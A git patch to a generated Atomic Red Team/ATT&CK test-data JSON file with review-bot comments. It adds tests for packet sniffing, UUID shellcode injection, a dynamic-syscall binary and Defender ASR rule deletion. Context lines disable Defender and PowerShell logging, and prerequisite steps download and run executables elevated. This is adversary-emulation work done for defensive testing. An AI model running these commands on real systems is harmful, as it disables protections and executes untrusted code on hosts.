From 8ac80e6a4ec1b01982900a56cf3e3a79b3e0f898 Mon Sep 17 00:00:00 2001 From: MSAdministrator Date: Thu, 15 Feb 2024 03:13:06 +0000 Subject: [PATCH] commit message --- data_collector/generated_attck_data_v3.json | 147 ++++++++++++++++++-- 1 file changed, 135 insertions(+), 12 deletions(-) diff --git a/data_collector/generated_attck_data_v3.json b/data_collector/generated_attck_data_v3.json index 39b90f4..89ee875 100644 --- a/data_collector/generated_attck_data_v3.json +++ b/data_collector/generated_attck_data_v3.json @@ -215322,6 +215322,7 @@ "sudo /tmp/t1040_linux_pcapdemo -4 -p 6 -t 3\n", "sudo /tmp/t1040_linux_pcapdemo -4 -P -p 17 -t 3\n", "sudo /tmp/t1040_linux_pcapdemo -a -f -t 3\n", + "New-NetEventSession -Name Capture007 -LocalFilePath \"$ENV:Temp\\sniff.etl\"\nAdd-NetEventPacketCaptureProvider -SessionName Capture007 -TruncationLength 100\nStart-NetEventSession -Name Capture007\nStop-NetEventSession -Name Capture007\nRemove-NetEventSession -Name Capture007\n", "powershell/collection/packet_capture", "python/collection/linux/sniffer", "python/collection/osx/sniffer", @@ -215894,6 +215895,20 @@ "name": "bash", "elevation_required": true } + }, + { + "name": "PowerShell Network Sniffing", + "auto_generated_guid": "9c15a7de-de14-46c3-bc2a-6d94130986ae", + "description": "PowerShell Built-in Cmdlets to capture network traffic.\nhttps://learn.microsoft.com/en-us/powershell/module/neteventpacketcapture/new-neteventsession?view=windowsserver2022-ps", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "New-NetEventSession -Name Capture007 -LocalFilePath \"$ENV:Temp\\sniff.etl\"\nAdd-NetEventPacketCaptureProvider -SessionName Capture007 -TruncationLength 100\nStart-NetEventSession -Name Capture007\nStop-NetEventSession -Name Capture007\nRemove-NetEventSession -Name Capture007\n", + "cleanup_command": "del $ENV:Temp\\sniff.etl", + "name": "powershell", + "elevation_required": true + } } ] } 
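Review bot: In the added "PowerShell Network Sniffing" test the `cleanup_command` is only `del $ENV:Temp\sniff.etl`; the `Capture007` session is torn down solely by the last line of `command`, so if `Add-NetEventPacketCaptureProvider` or `Start-NetEventSession` fails part way the named session is left behind and, presumably, the next `New-NetEventSession -Name Capture007` is refused because the name is already in use. Make the cleanup idempotent so a failed run does not poison the next one: `Remove-NetEventSession -Name Capture007 -ErrorAction SilentlyContinue` followed by `Remove-Item "$ENV:Temp\sniff.etl" -ErrorAction SilentlyContinue`. As this file is generated, the change belongs in the upstream atomics YAML the collector reads rather than here.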
@@ -278357,6 +278372,7 @@ "$process = Start-Process C:\\Windows\\System32\\werfault.exe -passthru\n\\T1055\\bin\\x64\\CreateRemoteThreadNative.exe -pid $process.Id -debug\n", "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n", "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n", + "Start-Process \"\\T1055\\bin\\x64\\uuid_injection.exe\"\nStart-Sleep -Seconds 7\nGet-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", "powershell/code_execution/invoke_dllinjection", "powershell/code_execution/invoke_reflectivepeinjection", "powershell/code_execution/invoke_shellcode", 
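Review bot: The added `command_list` entry runs `Start-Process "\T1055\bin\x64\uuid_injection.exe"`, a root-relative path, while the test's `exe_binary` default in the next hunk is `PathToAtomicsFolder\T1055\bin\x64\uuid_injection.exe`; the collector presumably drops the bare `PathToAtomicsFolder` token when it substitutes input-argument defaults, so anyone replaying commands from `command_list` gets a path that does not exist on the host. The same truncation produces `\T1027.007\bin\ninja_syscall1.exe` in the hunk at -672573, whereas the context line `$PathToAtomicsFolder\T1055\bin\x64\CreateThread.exe` shows commands that carry the variable literally survive intact. The existing `\T1055\bin\x64\CreateRemoteThreadNative.exe` context line shows this predates the commit, so the fix is in the collector's substitution step (map the token to `$PathToAtomicsFolder` instead of removing it) rather than in this generated file. The enclosing `command_list` array starts and ends outside the hunk.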
@@ -279316,7 +279332,36 @@ "name": "powershell", "elevation_required": false, "command": "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n", - "cleanup_command": "Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue" + "cleanup_command": "Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue\n" + } + }, + { + "name": "UUID custom process Injection", + "auto_generated_guid": "0128e48e-8c1a-433a-a11a-a5304734f1e1", + "description": "The UUIDs Process Injection code was first introduced by the NCC Group. The code can be stored in UUID forms on the heap and converted back to binary via UuidFromStringA at runtime. In this new custom version of UUID injection, EnumSystemLocalesA is the only API called to execute the code. We used custom UuidToString and UuidFromString implementations to avoid using UuidFromStringA and RPCRT4.dll, thereby eliminating the static signatures. This technique also avoided the use of VirtualAlloc, WriteProcessMemory and CreateThread\n\nThe injected shellcode will open a message box and a notepad.\n\nReference to NCC Group: https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\nConcept from: http://ropgadget.com/posts/abusing_win_functions.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_binary": { + "description": "PE binary", + "type": "path", + "default": "PathToAtomicsFolder\\T1055\\bin\\x64\\uuid_injection.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Portable Executable to inject must exist at specified location (#{exe_binary})\n", + "prereq_command": "if (Test-Path \"#{exe_binary}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{exe_binary}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/uuid_injection.exe\" -OutFile \"#{exe_binary}\"\n" + } 
+ ], + "executor": { + "command": "Start-Process \"#{exe_binary}\"\nStart-Sleep -Seconds 7\nGet-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", + "cleanup_command": "Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force", + "name": "powershell", + "elevation_required": true } } ] 
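Review bot: The new dependency's `get_prereq_command` downloads `uuid_injection.exe` from the `master` ref of the redcanaryco/atomic-red-team raw URL and the executor then runs whatever came back with `elevation_required: true`, with no integrity check between download and execution. The same download-then-execute pattern appears in the hunks at -361413, -653591 and -657342 (a Python installer from python.org, `ez_setup.py` and `get-pip.py` from bootstrap.pypa.io run via `cmd /c`) and at -672573 (`ninja_syscall1.exe`); because this is a generated file, each fix belongs in the corresponding upstream atomics YAML. For the GitHub artefacts, pin the URL to a commit SHA instead of a branch; for all of them, record the expected digest in the test and gate execution on it, e.g. `if ((Get-FileHash "#{exe_binary}").Hash -ne "<EXPECTED_SHA256>") { exit 1 }` as part of `prereq_command`, where `<EXPECTED_SHA256>` is a placeholder for the value the author measures. The `cmd /c "...\ez_setup.py"` lines additionally rely on the host's `.py` file association, which is not guaranteed to resolve to the interpreter just installed.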
@@ -330215,7 +330260,7 @@ "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v HideSCAPower /t REG_DWORD /d 1 /f\n", "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v HideSCAVolume /t REG_DWORD /d 1 /f\n", "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f\n", - "reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f\nREM do a little cleanup immediately to avoid execution issues with later tests\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /f >nul 2>&1\n", + "reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /f >nul 2>&1\n", "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\AtomicSafeMode\" /VE /T REG_SZ /F /D \"Service\"\n", "REG ADD 
\"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\AtomicSafeMode\" /VE /T REG_SZ /F /D \"Service\"\n", "reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f\n", 
@@ -331012,7 +331057,7 @@ "windows" ], "executor": { - "command": "reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f\nREM do a little cleanup immediately to avoid execution issues with later tests\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /f >nul 2>&1\n", + "command": "reg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f\nreg add HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell /v EnableScripts /f >nul 2>&1\n", "cleanup_command": "reg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging /v EnableModuleLogging /f >nul 2>&1\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1\nreg delete HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription /v EnableTranscripting /f >nul 2>&1\n", "name": "command_prompt", "elevation_required": true 
@@ -361413,12 +361458,12 @@ { "description": "Computer must have python 3 installed\n", "prereq_command": "py -3 --version >nul 2>&1\nexit /b %errorlevel%\n", - "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\"\nStart-Process -FilePath \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\" -ArgumentList \"/quiet InstallAllUsers=1 PrependPath=1 Include_test=0\" -Wait\n" }, { "description": "Computer must have pip installed\n", "prereq_command": "py -3 -m pip --version >nul 2>&1\nexit /b %errorlevel%\n", - "get_prereq_command": "echo \"PIP must be installed manually\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" }, { "description": "pypykatz must be installed and part of PATH\n", 
@@ -530975,6 +531020,8 @@ "reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiSpyware\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\" /v \"DisableAntiVirus\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableBehaviorMonitoring\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableIntrusionPreventionSystem\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableIOAVProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableOnAccessProtection\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRealtimeMonitoring\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableRoutinelyTakingAction\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableScanOnRealtimeEnable\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" /v \"DisableScriptScanning\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" /v \"DisableEnhancedNotifications\" /t REG_DWORD /d \"1\" /f >NUL 2>nul \nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"DisableBlockAtFirstSeen\" /t REG_DWORD /d \"1\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" /v \"SpynetReporting\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add 
\"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" /v \"MpEnablePus\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\" /v \"DisallowExploitProtectionOverride\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features\" /v \"TamperProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\software\\microsoft\\windows defender\\spynet\" /v \"SubmitSamplesConsent\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\nreg add \"HKLM\\Software\\Microsoft\\Windows Defender\" /v \"PUAProtection\" /t REG_DWORD /d \"0\" /f >NUL 2>nul\n", "Set-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\" -Name \"DisableAntiSpyware\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\" -Name \"DisableAntiVirus\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableBehaviorMonitoring\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableIntrusionPreventionSystem\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableIOAVProtection\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableOnAccessProtection\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableRealtimeMonitoring\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableRoutinelyTakingAction\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableScanOnRealtimeEnable\" -Value 1 \nSet-ItemProperty 
\"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\" -Name \"DisableScriptScanning\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting\" -Name \"DisableEnhancedNotifications\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" -Name \"DisableBlockAtFirstSeen\" -Value 1 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet\" -Name \"SpynetReporting\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine\" -Name \"MpEnablePus\" -Value 0 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\" -Name \"DisallowExploitProtectionOverride\" -Value 0 \nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Features\" -Name \"TamperProtection\" -Value 0 \nSet-ItemProperty \"HKLM:\\software\\microsoft\\windows defender\\spynet\" -Name \"SubmitSamplesConsent\" -Value 0 \nSet-ItemProperty \"HKLM:\\Software\\Microsoft\\Windows Defender\" -Name \"PUAProtection\" -Value 0 \n", "Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false \nConnect-VIServer -Server atomic.local -User root -Password pass\nGet-AdvancedSetting -Entity atomic.local -Name 'Security.AccountLockFailures' | Set-AdvancedSetting -Value '0' -Confirm:$false\nDisconnect-VIServer -Confirm:$false\n", + "$registryPath = \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Policy Manager\"\n\nif (-not (Test-Path $registryPath)) {\n New-Item -Path $registryPath -Force\n Write-Host \"Registry key created: $registryPath\"\n}\n\n$registryValueName = \"ASRRules\"\n\nif (Test-Path \"$registryPath\\$registryValueName\") {\n Remove-ItemProperty -Path $registryPath -Name $registryValueName\n Write-Host \"Registry value deleted: $registryValueName\"\n} else {\n New-ItemProperty -Path $registryPath -Name 
$registryValueName -PropertyType String -Value \"36190899-1602-49e8-8b27-eb1d0a1ce869=1\" -Force\n Write-Host \"Registry value created: $registryValueName\"\n}\n\n\nRemove-ItemProperty -Path $registryPath -Name $registryValueName\nWrite-Host \"Registry value deleted: $registryValueName\"", + "$registryPath = \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\ASR\\Rules\"\n\nif (-not (Test-Path $registryPath)) {\n New-Item -Path $registryPath -Force\n Write-Host \"Registry key created: $registryPath\"\n}\n\n$newValueName = \"36190899-1602-49e8-8b27-eb1d0a1ce869\"\n$newValueData = \"1\"\nNew-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force\nWrite-Host \"Registry value created: $newValueName with data $newValueData\"\n\nRemove-ItemProperty -Path $registryPath -Name $newValueName\nWrite-Host \"Registry value deleted: $newValueName\"", "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")", "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n", "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n" 
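Review bot: Both added ASR scripts remove Defender policy data with nothing to put it back: the first deletes the `ASRRules` value under `...\Windows Defender\Policy Manager` whenever it already exists (i.e. a genuinely deployed rule set), and the second writes `36190899-1602-49e8-8b27-eb1d0a1ce869` with `-Force`, overwriting any existing setting for that rule GUID, then removes it. The test definitions that carry these same scripts in the next hunk (-531919, "Delete Microsoft Defender ASR Rules - InTune" and "- GPO") have no `cleanup_command`, so on a managed host the configuration presumably stays gone until the next policy sync. The `if (Test-Path "$registryPath\$registryValueName")` branch in the first script also cannot do what it intends: the registry provider's `Test-Path` matches keys, not values, so the else branch creates the value every run and the unconditional `Remove-ItemProperty` at the end deletes it regardless. Capture the existing data before touching it, e.g. `$prev = (Get-ItemProperty -Path $registryPath -Name $registryValueName -ErrorAction SilentlyContinue).$registryValueName`, and restore it from a `cleanup_command` in the upstream YAML; the generated file should only inherit that change.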
@@ -531919,6 +531966,32 @@ "name": "powershell", "elevation_required": true } + }, + { + "name": "Delete Microsoft Defender ASR Rules - InTune", + "auto_generated_guid": "eea0a6c2-84e9-4e8c-a242-ac585d28d0d1", + "description": "This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates an InTune-based rules deployment.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$registryPath = \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Policy Manager\"\n\nif (-not (Test-Path $registryPath)) {\n New-Item -Path $registryPath -Force\n Write-Host \"Registry key created: $registryPath\"\n}\n\n$registryValueName = \"ASRRules\"\n\nif (Test-Path \"$registryPath\\$registryValueName\") {\n Remove-ItemProperty -Path $registryPath -Name $registryValueName\n Write-Host \"Registry value deleted: $registryValueName\"\n} else {\n New-ItemProperty -Path $registryPath -Name $registryValueName -PropertyType String -Value \"36190899-1602-49e8-8b27-eb1d0a1ce869=1\" -Force\n Write-Host \"Registry value created: $registryValueName\"\n}\n\n\nRemove-ItemProperty -Path $registryPath -Name $registryValueName\nWrite-Host \"Registry value deleted: $registryValueName\"", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Delete Microsoft Defender ASR Rules - GPO", + "auto_generated_guid": "0e7b8a4b-2ca5-4743-a9f9-96051abb6e50", + "description": "This test simulates the deletion of the ASR rules loaded by Microsoft Defender using the registry. 
Depending on the deployment, rules can be pushed either using GPO or InTune, This test simulates a GPO-based rules deployment.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$registryPath = \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\ASR\\Rules\"\n\nif (-not (Test-Path $registryPath)) {\n New-Item -Path $registryPath -Force\n Write-Host \"Registry key created: $registryPath\"\n}\n\n$newValueName = \"36190899-1602-49e8-8b27-eb1d0a1ce869\"\n$newValueData = \"1\"\nNew-ItemProperty -Path $registryPath -Name $newValueName -PropertyType String -Value $newValueData -Force\nWrite-Host \"Registry value created: $newValueName with data $newValueData\"\n\nRemove-ItemProperty -Path $registryPath -Name $newValueName\nWrite-Host \"Registry value deleted: $newValueName\"", + "name": "powershell", + "elevation_required": true + } } ] } 
@@ -653591,12 +653664,12 @@ { "description": "Computer must have python 3 installed\n", "prereq_command": "if (python --version) {exit 0} else {exit 1}\n", - "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\"\nStart-Process -FilePath \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\" -ArgumentList \"/quiet InstallAllUsers=1 PrependPath=1 Include_test=0\" -Wait\n" }, { "description": "Computer must have pip installed\n", "prereq_command": "if (pip3 -V) {exit 0} else {exit 1}\n", - "get_prereq_command": "echo \"PIP must be installed manually\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" }, { "description": "adidnsdump must be installed and part of PATH\n", 
@@ -657342,7 +657415,7 @@ { "description": "Check if python exists on the machine\n", "prereq_command": "if (python --version) {exit 0} else {exit 1}\n", - "get_prereq_command": "echo \"Python 3 must be installed manually\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\"\nStart-Process -FilePath \"PathToAtomicsFolder\\..\\ExternalPayloads\\python_setup.exe\" -ArgumentList \"/quiet InstallAllUsers=1 PrependPath=1 Include_test=0\" -Wait\n" } ], "executor": { 
@@ -672573,10 +672646,52 @@ "phase_name": "defense-evasion" } ], - "command_list": [], + "command_list": [ + "Start-Process \"\\T1027.007\\bin\\ninja_syscall1.exe\"\nStart-Sleep -Seconds 7\nif (Test-Path \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\") { Remove-Item \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\" -Force; Write-Host \"[+] hello.log removed.\" }\n" + ], "commands": [], "queries": [], - "parsed_datasets": [], + "parsed_datasets": [ + { + "source": "atomics/T1027.007/T1027.007.yaml", + "name": "Atomic Red Team Test - Obfuscated Files or Information: Dynamic API Resolution", + "content": { + "attack_technique": "T1027.007", + "display_name": "Obfuscated Files or Information: Dynamic API Resolution", + "atomic_tests": [ + { + "name": "Dynamic API Resolution-Ninja-syscall", + "auto_generated_guid": "578025d5-faa9-4f6d-8390-aae739d507e1", + "description": "This test calls NtCreateFile via API hashing and dynamic syscall resolution. I have dubbed this particular combination of techniques 'Ninja-syscall'. 
When successful, a new file named 'hello.log' will be created in the default user's temporary folder, which is a common location for a dropper.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_binary": { + "description": "PE binary", + "type": "path", + "default": "PathToAtomicsFolder\\T1027.007\\bin\\ninja_syscall1.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Portable Executable to run must exist at specified location (#{exe_binary})\n", + "prereq_command": "if (Test-Path \"#{exe_binary}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{exe_binary}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.007/bin/ninja_syscall1.exe\" -OutFile \"#{exe_binary}\"\n" + } + ], + "executor": { + "command": "Start-Process \"#{exe_binary}\"\nStart-Sleep -Seconds 7\nif (Test-Path \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\") { Remove-Item \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\" -Force; Write-Host \"[+] hello.log removed.\" }\n", + "cleanup_command": "if (Test-Path \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\") { Remove-Item \"C:\\Users\\Default\\AppData\\Local\\Temp\\hello.log\" -Force; Write-Host \"[+] hello.log removed.\" }", + "name": "powershell", + "elevation_required": true + } + } + ] + } + } + ], "possible_detections": [], "external_reference": [], "controls": [], 
